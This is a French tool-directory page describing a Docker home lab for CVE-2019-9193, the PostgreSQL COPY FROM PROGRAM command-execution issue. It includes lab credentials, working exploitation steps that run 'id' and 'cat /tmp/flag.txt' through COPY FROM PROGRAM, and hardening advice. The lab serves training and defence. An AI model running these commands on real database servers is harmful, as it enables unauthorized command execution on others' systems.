Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-9193-Home-Lab — Ce laboratoire simule la CVE-2019-9193 - RCE PostgreSQL COPY FROM PROGRAM | Kitploit
Outils/GitHubGitHub/netw0rk7/cve-2019-9193-home-lab
Analyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationSécurité des Bases de DonnéesLabs et Pratique
GitHubnetw0rk7/cve-2019-9193-home-lab

CVE-2019-9193-Home-Lab

Ce laboratoire simule la CVE-2019-9193 - RCE PostgreSQL COPY FROM PROGRAM

Voir le dépôt
il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ANGLAIS CI-DESSOUS

CVE-2019-9193 — PostgreSQL COPY FROM PROGRAM RCE

CVE20199193-2

Ce lab simule la vulnérabilité CVE-2019-9193 présente dans PostgreSQL 9.3 - 11.2, qui permet à un utilisateur superuser ou disposant du rôle pg_execute_server_program d'utiliser la commande :

root@kitploit:~
COPY ... FROM PROGRAM '<command>'

pour exécuter directement des commandes OS, entraînant une exécution de commandes à distance (RCE) si un attaquant peut accéder à la base de données.

Ce lab vous permet d'utiliser cette capacité pour lire le fichier :

root@kitploit:~
/tmp/flag.txt

Objectif du lab

  1. Connectez-vous à PostgreSQL avec :
    • Utilisateur : postgres
    • Mot de passe : sentinel7
    • Port : 5433
  2. Utilisez COPY FROM PROGRAM pour exécuter des commandes OS
  3. Lisez le flag depuis /tmp/flag.txt

Pour commencer

root@kitploit:~
docker compose build
docker compose up -d

Ensuite, connectez-vous à la base de données :

root@kitploit:~
psql -U postgres -h 127.0.0.1 -p 5433

Étapes d'exploitation

1) Créer une table pour stocker la sortie

root@kitploit:~
CREATE TABLE cmd_exec(cmd_output text);

2) Tester la RCE avec la commande id

root@kitploit:~
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

3) Lire le flag

root@kitploit:~
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;

Exemple de sortie :

root@kitploit:~
flag{SECRET}

Recommandations de sécurité

  • N'utilisez jamais l'utilisateur postgres avec une application de production
  • Limitez les rôles afin qu'ils ne disposent pas de pg_execute_server_program
  • Désactivez ou restreignez l'utilisation de COPY PROGRAM
  • Protégez tous les systèmes contre les injections SQL

VERSION ANGLAISE

CVE-2019-9193 — PostgreSQL COPY FROM PROGRAM RCE

Ce lab simule CVE-2019-9193, une vulnérabilité de PostgreSQL 9.3–11.2 permettant :

root@kitploit:~
COPY ... FROM PROGRAM '<command>'

d'exécuter des commandes OS lorsqu'elle est utilisée par un superuser ou un rôle disposant de pg_execute_server_program.

Votre tâche consiste à exploiter cette fonctionnalité pour lire :

root@kitploit:~
/tmp/flag.txt

Objectif

  1. Connectez-vous à PostgreSQL :
    • Utilisateur : postgres
    • Mot de passe : sentinel7
    • Port hôte : 5433
  2. Utilisez COPY FROM PROGRAM pour :
    • Exécuter des commandes OS
    • Récupérer le flag

Pour commencer

root@kitploit:~
docker compose build
docker compose up -d

Connectez-vous via :

root@kitploit:~
psql -U postgres -h 127.0.0.1 -p 5433

Exploitation

1) Créer la table

root@kitploit:~
CREATE TABLE cmd_exec(cmd_output text);

2) Tester la RCE

root@kitploit:~
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

3) Lire le flag

root@kitploit:~
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;

Notes de sécurité

  • N'utilisez jamais le superuser PostgreSQL pour exécuter des applications
  • N'accordez pas pg_execute_server_program inutilement
  • Désactivez ou restreignez COPY PROGRAM
  • Durcissez les applications contre l'injection SQL

Télécharger l’outil